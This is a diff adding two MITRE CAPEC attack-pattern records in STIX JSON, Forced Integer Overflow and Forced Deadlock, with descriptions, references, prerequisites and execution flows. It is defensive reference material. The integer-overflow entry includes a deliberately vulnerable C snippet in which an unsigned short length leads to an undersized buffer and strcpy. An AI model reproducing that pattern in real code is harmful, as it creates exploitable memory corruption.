+ "spec_version": "2.0",
58
+ "type": "bundle"
59
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6.json ADDED
@@ -0,0 +1,129 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--84574355-d771-4096-8d87-a4d80c74f709",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "This attack forces an integer variable to go out of range. The integer variable is often used as an offset such as size of memory allocation or similarly. The attacker would typically control the value of such variable and try to get it out of range. For instance the integer in question is incremented past the maximum possible value, it may wrap to become a very small, or negative number, therefore providing a very incorrect value which can lead to unexpected behavior. At worst the attacker can execute arbitrary code.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-92",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/92.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-190",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/190.html"
18
+ },
19
+ {
20
+ "external_id": "CWE-128",
21
+ "source_name": "cwe",
22
+ "url": "http://cwe.mitre.org/data/definitions/128.html"
23
+ },
24
+ {
25
+ "external_id": "CWE-120",
26
+ "source_name": "cwe",
27
+ "url": "http://cwe.mitre.org/data/definitions/120.html"
28
+ },
29
+ {
30
+ "external_id": "CWE-122",
31
+ "source_name": "cwe",
32
+ "url": "http://cwe.mitre.org/data/definitions/122.html"
33
+ },
34
+ {
35
+ "external_id": "CWE-196",
36
+ "source_name": "cwe",
37
+ "url": "http://cwe.mitre.org/data/definitions/196.html"
38
+ },
39
+ {
40
+ "external_id": "CWE-680",
41
+ "source_name": "cwe",
42
+ "url": "http://cwe.mitre.org/data/definitions/680.html"
43
+ },
44
+ {
45
+ "external_id": "CWE-697",
46
+ "source_name": "cwe",
47
+ "url": "http://cwe.mitre.org/data/definitions/697.html"
48
+ },
49
+ {
50
+ "description": "Integer Overflows",
51
+ "external_id": "03",
52
+ "source_name": "WASC",
53
+ "url": "http://projects.webappsec.org/Integer-Overflows"
54
+ },
55
+ {
56
+ "description": "J. Viega, G. McGraw, Building Secure Software, 2002, Addison-Wesley",
57
+ "external_id": "REF-131",
58
+ "source_name": "reference_from_CAPEC"
59
+ },
60
+ {
61
+ "description": "Robert C. Seacord, SAMATE - Software Assurance Metrics And Tool Evaluation, 2006--05---22, National Institute of Standards and Technology (NIST)",
62
+ "external_id": "REF-547",
63
+ "source_name": "reference_from_CAPEC",
64
+ "url": "http://samate.nist.gov/SRD/view_testcase.php?tID=1511"
65
+ },
66
+ {
67
+ "description": "Robert C. Seacord, Secure Coding in C and C++",
68
+ "external_id": "REF-548",
69
+ "source_name": "reference_from_CAPEC"
70
+ }
71
+ ],
72
+ "id": "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6",
73
+ "modified": "2022-09-29T00:00:00.000Z",
74
+ "name": "Forced Integer Overflow",
75
+ "object_marking_refs": [
76
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
77
+ ],
78
+ "type": "attack-pattern",
79
+ "x_capec_abstraction": "Detailed",
80
+ "x_capec_child_of_refs": [
81
+ "attack-pattern--1f3b920a-a706-494c-9486-69531a514912"
82
+ ],
83
+ "x_capec_consequences": {
84
+ "Access_Control": [
85
+ "Gain Privileges"
86
+ ],
87
+ "Authorization": [
88
+ "Gain Privileges"
89
+ ],
90
+ "Availability": [
91
+ "Execute Unauthorized Commands (Run Arbitrary Code)",
92
+ "Unreliable Execution"
93
+ ],
94
+ "Confidentiality": [
95
+ "Gain Privileges",
96
+ "Execute Unauthorized Commands (Run Arbitrary Code)",
97
+ "Read Data"
98
+ ],
99
+ "Integrity": [
100
+ "Modify Data",
101
+ "Execute Unauthorized Commands (Run Arbitrary Code)"
102
+ ]
103
+ },
104
+ "x_capec_domains": [
105
+ "Software"
106
+ ],
107
+ "x_capec_example_instances": [
108
+ "Integer overflow in the ProcAuWriteElement function in server/dia/audispatch.c in Network Audio System (NAS) before 1.8a SVN 237 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large max_samples value. See also: CVE-2007-1544",
109
+ "\n <xhtml:p>The following code illustrates an integer overflow. The declaration of total integer as \"unsigned short int\" assumes that the length of the first and second arguments fits in such an integer [REF-547], [REF-548].</xhtml:p>\n <xhtml:div style=\"margin-left:1em;\" class=\"informative\">include <stdlib.h>include <string.h>include <stdio.h>\n int main (int argc, char *const *argv){<xhtml:div style=\"margin-left:1em;\">if (argc !=3){<xhtml:div style=\"margin-left:1em;\">printf(\"Usage: prog_name <string1> <string2>\\n\");exit(-1);</xhtml:div>\n }unsigned short int total;total = strlen(argv[1])+strlen(argv[2])+1;char * buff = (char *)malloc(total);strcpy(buff, argv[1]);strcpy(buff, argv[2]);</xhtml:div>\n }</xhtml:div>\n "
110
+ ],
111
+ "x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p>The first step is exploratory meaning the attacker looks for an integer variable that they can control.</p></li></ol></div><div><h3>Experiment</h3><ol><li> <p>The attacker finds an integer variable that they can write into or manipulate and try to get the value of the integer out of the possible range.</p></li></ol></div><div><h3>Exploit</h3><ol><li> <p>The integer variable is forced to have a value out of range which set its final value to an unexpected value.</p></li><li> <p>The target host acts on the data and unexpected behavior may happen.</p></li></ol></div>",
112
+ "x_capec_likelihood_of_attack": "High",
113
+ "x_capec_prerequisites": [
114
+ "The attacker can manipulate the value of an integer variable utilized by the target host.",
115
+ "The target host does not do proper range checking on the variable before utilizing it.",
116
+ "When the integer variable is incremented or decremented to an out of range value, it gets a very different value (e.g. very small or negative number)"
117
+ ],
118
+ "x_capec_skills_required": {
119
+ "High": "Exploiting a buffer overflow by injecting malicious code into the stack of a software system or even the heap can require a higher skill level.",
120
+ "Low": "An attacker can simply overflow an integer by inserting an out of range value."
121
+ },
122
+ "x_capec_status": "Draft",
123
+ "x_capec_typical_severity": "High",
124
+ "x_capec_version": "3.9"
125
+ }
126
+ ],
127
+ "spec_version": "2.0",
128
+ "type": "bundle"
129
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--36a2f844-0c20-41d7-9a10-66f1e4c43db8.json ADDED
@@ -0,0 +1,103 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--fa0985dc-c78f-4ff0-ae87-ddcc4c607ff0",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "The adversary triggers and exploits a deadlock condition in the target software to cause a denial of service. A deadlock can occur when two or more competing actions are waiting for each other to finish, and thus neither ever does. Deadlock conditions can be difficult to detect.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-25",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/25.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-412",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/412.html"
18
+ },
19
+ {
20
+ "external_id": "CWE-567",
21
+ "source_name": "cwe",
22
+ "url": "http://cwe.mitre.org/data/definitions/567.html"
23
+ },
24
+ {
25
+ "external_id": "CWE-662",
26
+ "source_name": "cwe",
27
+ "url": "http://cwe.mitre.org/data/definitions/662.html"
28
+ },
29
+ {
30
+ "external_id": "CWE-667",
31
+ "source_name": "cwe",
32
+ "url": "http://cwe.mitre.org/data/definitions/667.html"
33
+ },
34
+ {
35
+ "external_id": "CWE-833",
36
+ "source_name": "cwe",
37
+ "url": "http://cwe.mitre.org/data/definitions/833.html"
38
+ },
39
+ {
40
+ "external_id": "CWE-1322",
41
+ "source_name": "cwe",
42
+ "url": "http://cwe.mitre.org/data/definitions/1322.html"
43
+ },
44
+ {
45
+ "description": "Endpoint Denial of Service: Application or System Exploitation",
46
+ "external_id": "T1499.004",
47
+ "source_name": "ATTACK",
48
+ "url": "https://attack.mitre.org/wiki/Technique/T1499/004"
49
+ },
50
+ {
51
+ "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
52
+ "external_id": "REF-1",
53
+ "source_name": "reference_from_CAPEC"
54
+ },
55
+ {
56
+ "description": "Wikipedia, The Wikimedia Foundation, Inc",
57
+ "external_id": "REF-101",
58
+ "source_name": "reference_from_CAPEC",
59
+ "url": "http://en.wikipedia.org/wiki/Deadlock"
60
+ },
61
+ {
62
+ "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)",
63
+ "external_id": "REF-609",
64
+ "source_name": "reference_from_CAPEC",
65
+ "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection.html"
66
+ }
67
+ ],
68
+ "id": "attack-pattern--36a2f844-0c20-41d7-9a10-66f1e4c43db8",
69
+ "modified": "2022-09-29T00:00:00.000Z",
70
+ "name": "Forced Deadlock",
71
+ "object_marking_refs": [
72
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
73
+ ],
74
+ "type": "attack-pattern",
75
+ "x_capec_abstraction": "Meta",
76
+ "x_capec_consequences": {
77
+ "Availability": [
78
+ "Resource Consumption (A successful forced deadlock attack compromises the availability of the system by exhausting its available resources.)"
79
+ ]
80
+ },
81
+ "x_capec_domains": [
82
+ "Software"
83
+ ],
84
+ "x_capec_example_instances": [
85
+ "An example of a deadlock which may occur in database products is the following. Client applications using the database may require exclusive access to a table, and in order to gain exclusive access they ask for a lock. If one client application holds a lock on a table and attempts to obtain the lock on a second table that is already held by a second client application, this may lead to deadlock if the second application then attempts to obtain the lock that is held by the first application (Source: Wikipedia, http://en.wikipedia.org/wiki/Deadlock)"
86
+ ],
87
+ "x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p>The adversary initiates an exploratory phase to get familiar with the system.</p></li><li> <p>The adversary triggers a first action (such as holding a resource) and initiates a second action which will wait for the first one to finish.</p></li><li> <p>If the target program has a deadlock condition, the program waits indefinitely resulting in a denial of service.</p></li></ol></div>",
88
+ "x_capec_likelihood_of_attack": "Low",
89
+ "x_capec_prerequisites": [
90
+ "The target host has a deadlock condition. There are four conditions for a deadlock to occur, known as the Coffman conditions. [REF-101]",
91
+ "The target host exposes an API to the user."
92
+ ],
93
+ "x_capec_skills_required": {
94
+ "Medium": "This type of attack may be sophisticated and require knowledge about the system's resources and APIs."
95
+ },
96
+ "x_capec_status": "Stable",
97
+ "x_capec_typical_severity": "High",
98
+ "x_capec_version": "3.9"
99
+ }
100
+ ],
101
+ "spec_version": "2.0",
102
+ "type": "bundle"
103
+ }